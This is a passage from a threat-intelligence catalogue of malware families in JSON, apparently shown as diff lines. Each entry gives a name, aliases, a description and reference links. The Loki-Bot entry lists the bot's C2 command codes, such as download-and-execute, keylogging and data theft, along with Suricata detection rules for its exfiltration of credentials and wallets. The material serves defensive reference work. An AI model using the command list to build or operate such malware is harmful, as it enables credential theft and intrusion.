This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/R3MRUM/loki-parse", - "http://www.malware-traffic-analysis.net/2017/06/12/index.html", - "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", - "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", - "http://blog.fernandodominguez.me/lokis-antis-analysis/", - "https://phishme.com/loki-bot-malware/", - "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", - "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", - "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850" - ] - } - }, - { - "uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886", - "value": "Bankshot", - 
"description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF", - "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/" - ] - } - }, - { - "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a", - "value": "Luminosity RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark", - "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", - "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", - "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/" - ] - } - }, - { - "uuid": "b746a645-5974-44db-a811-a024214b7fba", - "value": "running_rat", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" - ] - } - }, - { - "uuid": "6a100902-7204-4f20-b838-545ed86d4428", - "value": "WinMM", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - } - }, - { - "uuid": "4305d59a-0d07-4021-a902-e7996378898b", - "value": "FlexiSpy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" - ] - } - }, - { - "uuid": "61b2dd12-2381-429d-bb64-e3210804a462", - "value": "DirCrypt", - "description": "", - "meta": { - "synonyms": [], - "type": 
[], - "refs": [ - "https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/", - "https://www.checkpoint.com/download/public-files/TCC_WP_Hacking_The_Hacker.pdf" - ] - } - }, - { - "uuid": "9b0aa458-dfa9-48af-87ea-c36d1501376c", - "value": "ZeroT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx" - ] - } - }, - { - "uuid": "e6952b4d-e96d-4641-a88f-60074776d553", - "value": "RTM", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf" - ] - } - }, - { - "uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711", - "value": "Dorshel", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] - } - }, - { - "uuid": "bab92070-3589-4b7e-bf05-4f54bfefc2ca", - "value": "Kazuar", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/" - ] - } - }, - { - "uuid": "71d8ef43-3767-494b-afaa-f58aad70df65", - "value": "WebC2-Qbp", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "ac2608e9-7851-409f-b842-e265b877a53c", - "value": "7ev3n", - "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. 
This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/", - "https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n" - ] - } - }, - { - "uuid": "1ebb6107-f97b-45f6-ae81-a671ac437181", - "value": "GooPic Drooper", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/" - ] - } - }, - { - "uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f", - "value": "HttpBrowser", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/" - ] - } - }, - { - "uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7", - "value": "RawPOS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite" - ] - } - }, - { - "uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d", - "value": "OpBlockBuster", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel/" - ] - } - }, - { - "uuid": "d3e16d46-e436-4757-b962-6fd393056415", - "value": "Apocalipto", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.visakorea.com/dam/VCOM/download/merchants/Grocery_Malware_04242013.pdf" - ] - } - }, - { - "uuid": "1ed36f9a-ae00-4d16-bbf7-e97217385fb1", - "value": "AdamLocker", - 
"description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016", - "https://twitter.com/JaromirHorejsi/status/813712587997249536" - ] - } - }, - { - "uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5", - "value": "RokRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf", - "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html", - "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", - "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", - "https://www.youtube.com/watch?v=uoBQE5s2ba4", - "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/" - ] - } - }, - { - "uuid": "3482f5fe-f129-4c77-ae98-76e25f6086b9", - "value": "Viper RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/", - "https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/" - ] - } - }, - { - "uuid": "15094548-7555-43ee-8c0d-4557d6d8a087", - "value": "WebC2-Kt3", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "b749ff3a-df68-4b38-91f1-649864eae52c", - "value": "Pirrit", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/", - 
"http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf" - ] - } - }, - { - "uuid": "32b95dc7-03a6-45ab-a991-466208dd92d2", - "value": "Xaynnalc", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/michalmalik/status/846368624147353601" - ] - } - }, - { - "uuid": "5f638985-49e1-4059-b2eb-f2ffa397b212", - "value": "Conficker", - "description": "", - "meta": { - "synonyms": [ - "traffic converter", - "downadup" - ], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2009/05/win32conficker.html" - ] - } - }, - { - "uuid": "bee73d0f-8ff3-44ba-91dc-d883884c754e", - "value": "Acronym", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/acronym-m-is-for-malware/" - ] - } - }, - { - "uuid": "ac75d0a3-bb99-4453-9567-a6c8ba87a706", - "value": "Credraptor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" - ] - } - }, - { - "uuid": "713d8ec4-4983-4fbb-827c-2ef5bc0e6930", - "value": "Dockster", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html", - "https://www.f-secure.com/weblog/archives/00002466.html" - ] - } - }, - { - "uuid": "74f8db32-799c-41e5-9815-6272908ede57", - "value": "MS Exchange Tool", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/nccgroup/Royal_APT", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" - ] - } - }, - { - "uuid": "fc91803f-610c-4ad5-ba0c-b78d65abc6db", - "value": "Darktrack RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml", - "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html" - ] - } - }, - { - "uuid": "f5cabe73-b5d6-4503-8350-30a6d54c32ef", - "value": "Raxir", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/PhysicalDrive0/statuses/798825019316916224" - ] - } - }, - { - "uuid": "faa2196f-df4c-454c-995e-ded7864d5fa8", - "value": "Stabuniq", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html", - "https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers" - ] - } - }, - { - "uuid": "892cb6c2-b96c-4f77-a9cf-4dd3d0c1cc40", - "value": "WMI Ghost", - "description": "", - "meta": { - "synonyms": [ - "Wimmie", - "Syndicasec" - ], - "type": [], - "refs": [ - "https://secrary.com/ReversingMalware/WMIGhost/", - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] - } - }, - { - "uuid": "8c246ec4-eaa5-42c0-b137-29f28cbb6832", - "value": "Carbanak", - "description": "", - "meta": { - "synonyms": [ - "Anunak" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", - "https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf", - "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf" - ] - } - }, - { - "uuid": "6363cc2f-08f1-47a0-adbf-5cf19ea89ffd", - "value": "MM Core", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" - ] - } - }, - { - "uuid": "3ec67717-acd5-401b-8e9f-47e79edd07a0", - "value": "CryptoLuck", - "description": "", - "meta": { - "synonyms": [], - "type": [], - 
"refs": [ - "http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/" - ] - } - }, - { - "uuid": "1cc9d450-88cd-435c-bb74-8410d2d22571", - "value": "YoungLotus", - "description": "Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n", - "meta": { - "synonyms": [ - "DarkShare" - ], - "type": [], - "refs": [ - "https://www.youtube.com/watch?v=AUGxYhE_CUY" - ] - } - }, - { - "uuid": "09b555be-8bac-44b2-8741-922ee0b87880", - "value": "Satana", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/threat-spotlight-satan-raas" - ] - } - }, - { - "uuid": "6201c337-1599-4ced-be9e-651a624c20be", - "value": "GhostAdmin", - "description": "", - "meta": { - "synonyms": [ - "Ghost iBot" - ], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/", - "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html" - ] - } - }, - { - "uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed", - "value": "XBTL", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "e186384b-8001-4cdd-b170-1548deb8bf04", - "value": "SpyBanker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://news.drweb.com/show/?i=11104&lng=en", - "http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/" - ] - } - }, - { - "uuid": "591b2882-65ba-4629-9008-51ed3467510a", - "value": "Gaudox", - "description": "Gaudox is a http loader, written in 
C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only).", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html" - ] - } - }, - { - "uuid": "91191c0a-96d8-40b8-b8fb-daa0ad009c87", - "value": "NgrBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securingtomorrow.mcafee.com/mcafee-labs/ngrbot-spreads-via-chat/", - "https://research.checkpoint.com/dorkbot-an-investigation/", - "http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html" - ] - } - }, - { - "uuid": "bc128d41-33e6-40ec-aaf2-9a05da9a0a27", - "value": "ASPC", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b", - "value": "CookieBag", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "0646a6eb-1c13-4d87-878e-9431314597bf", - "value": "Snojan", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9" - ] - } - }, - { - "uuid": "26b91007-a8ae-4e32-bd99-292e44735c3d", - "value": "Smominru", - "description": "", - "meta": { - "synonyms": [ - "Ismo" - ], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", - "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" - ] - } - }, - { - "uuid": "5060756f-8385-465d-a7dd-7bf09a54da92", - "value": "Alphabet Ransomware", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/JaromirHorejsi/status/813714602466877440" - ] - } - }, - { - "uuid": 
"cd397973-8f42-4c49-8322-414ea77ec773", - "value": "Olyx", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", - "https://news.drweb.com/show/?i=1750&lng=en&c=14" - ] - } - }, - { - "uuid": "3b5faa15-e87e-4aaf-b791-2c5e593793e6", - "value": "Koadic", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", - "https://github.com/zerosum0x0/koadic" - ] - } - }, - { - "uuid": "51f53823-d289-4176-af45-3fca7eda824b", - "value": "Ramdo", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88", - "value": "RedAlpha", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.recordedfuture.com/redalpha-cyber-campaigns/" - ] - } - }, - { - "uuid": "77c20bd9-5403-4f99-bae5-c54f3f38a6b6", - "value": "Shujin", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.nyxbone.com/malware/chineseRansom.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/" - ] - } - }, - { - "uuid": "c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200", - "value": "yty", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" - ] - } - }, - { - "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387", - "value": "Xbot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/", - "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/" - ] - } - 
}, - { - "uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e", - "value": "WMImplant", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html" - ] - } - }, - { - "uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5", - "value": "HyperBro", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/luckymouse-hits-national-data-center/86083/" - ] - } - }, - { - "uuid": "aaeaf9ee-2f3d-4141-9d45-ec383ba8445f", - "value": "Mole", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware", - "https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/" - ] - } - }, - { - "uuid": "e1410684-c695-4c89-ae5f-80ced136afbd", - "value": "Gh0stnet", - "description": "", - "meta": { - "synonyms": [ - "Remosh" - ], - "type": [], - "refs": [ - "https://en.wikipedia.org/wiki/GhostNet", - "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html" - ] - } - }, - { - "uuid": "ddf63295-cdba-4c70-a4c6-623ba2b5e6dd", - "value": "Nabucur", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "a70e93a7-3578-47e1-9926-0818979ed866", - "value": "RedLeaves", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "http://blog.macnica.net/blog/2017/12/post-8c22.html", - "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves", - "https://www.jpcert.or.jp/magazine/acreport-redleaves.html" - ] - } - }, - { - 
"uuid": "d84ebd91-58f6-459f-96a1-d028a1719914", - "value": "WellMess", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html" - ] - } - }, - { - "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267", - "value": "Woolger", - "description": "", - "meta": { - "synonyms": [ - "WoolenLogger" - ], - "type": [], - "refs": [ - "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", - "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" - ] - } - }, - { - "uuid": "d7196f6a-757b-4124-ae28-f403e5d84fcb", - "value": "GoldenEye", - "description": "", - "meta": { - "synonyms": [ - "Petya/Mischa" - ], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", - "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/", - "http://www.threatgeek.com/2017/02/spying-on-goldeneye-ransomware.html" - ] - } - }, - { - "uuid": "80acc956-d418-42e3-bddf-078695a01289", - "value": "Dok", - "description": "", - "meta": { - "synonyms": [ - "Retefe" - ], - "type": [], - "refs": [ - "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/", - "https://www.govcert.admin.ch/blog/33/the-retefe-saga", - "http://www.brycampbell.co.uk/new-blog/2017/4/30/retefe-and-osxdok-one-and-the-same", - "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/" - ] - } - }, - { - "uuid": "a396a0bb-6dc5-424a-bdbd-f8ba808ca2c2", - "value": "SynAck", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" - ] - } - }, - { - "uuid": "5f9ba149-100a-46eb-a959-0645d872975b", - "value": "XPCTRA", - "description": "Incorporates code of Quasar RAT.", - "meta": { - "synonyms": [ - "Expectra" - ], - "type": [], 
- "refs": [ - "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/", - "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis" - ] - } - }, - { - "uuid": "6f155c95-3090-4730-8d3b-0b246162a83a", - "value": "GetMail", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "48f95941-8369-4f80-b2b4-abbacd4bc411", - "value": "NewPosThings", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/", - "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", - "https://asert.arbornetworks.com/lets-talk-about-newposthings/", - "http://www.cyintanalysis.com/a-quick-look-at-a-likely-newposthings-sample/" - ] - } - }, - { - "uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a", - "value": "BKA Trojaner", - "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.", - "meta": { - "synonyms": [ - "bwin3_bka" - ], - "type": [], - "refs": [ - "https://www.evild3ad.com/405/bka-trojaner-ransomware/" - ] - } - }, - { - "uuid": "a0899fec-161d-4ba8-9594-8b5620c21705", - "value": "Prilex", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.kaspersky.com/blog/chip-n-pin-cloning/21502", - "https://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/" - ] - } - }, - { - "uuid": "fbed27da-551d-4793-ba7e-128256326909", - "value": "BravoNC", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" - ] - } - }, - { - "uuid": 
"910c3fd2-56e5-4f1d-8df0-2aa0b293b7d9", - "value": "Jigsaw", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "a954e642-4cf4-4293-a4b0-c82cf2db785d", - "value": "Neutrino POS", - "description": "", - "meta": { - "synonyms": [ - "Jimmy" - ], - "type": [], - "refs": [ - "https://securelist.com/neutrino-modification-for-pos-terminals/78839/", - "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" - ] - } - }, - { - "uuid": "c57a4168-cd09-4611-a665-bbcede80f42b", - "value": "Monero Miner", - "description": "", - "meta": { - "synonyms": [ - "CoinMiner" - ], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/" - ] - } - }, - { - "uuid": "9cfdc3ea-c838-4ac5-bff2-57c92ec24b48", - "value": "Godzilla Loader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4349&p=28427#p28346" - ] - } - }, - { - "uuid": "e88eb9b1-dc8b-4696-8dcf-0c29924d0f8b", - "value": "Sakula RAT", - "description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer.", - "meta": { - "synonyms": [ - "Sakurel" - ], - "type": [], - "refs": [ - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1", - "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99", - "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula", - "https://www.secureworks.com/research/sakula-malware-family" - ] - } - }, - { - "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", - "value": "Unidentified 033", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "7f3794fc-662e-4dde-b793-49bcaccc96f7", - "value": "WSO", - "description": "", - "meta": { - "synonyms": [ - "Webshell by Orb" - ], - "type": [], - 
"refs": [ - "https://github.com/wso-shell", - "https://securelist.com/energetic-bear-crouching-yeti/85345/" - ] - } - }, - { - "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", - "value": "Bahamut", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", - "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" - ] - } - }, - { - "uuid": "f86b675a-b7b2-4a40-b4fd-f62fd96440f1", - "value": "Freenki Loader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", - "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" - ] - } - }, - { - "uuid": "f7674d06-450a-4150-9180-afef94cce53c", - "value": "KokoKrypt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/struppigel/status/812726545173401600" - ] - } - }, - { - "uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28", - "value": "Olympic Destroyer", - "description": "Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html", - "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/", - "https://securelist.com/the-devils-in-the-rich-header/84348/", - "https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/", - "https://securelist.com/olympic-destroyer-is-still-alive/86169/", - "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html", - "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", - 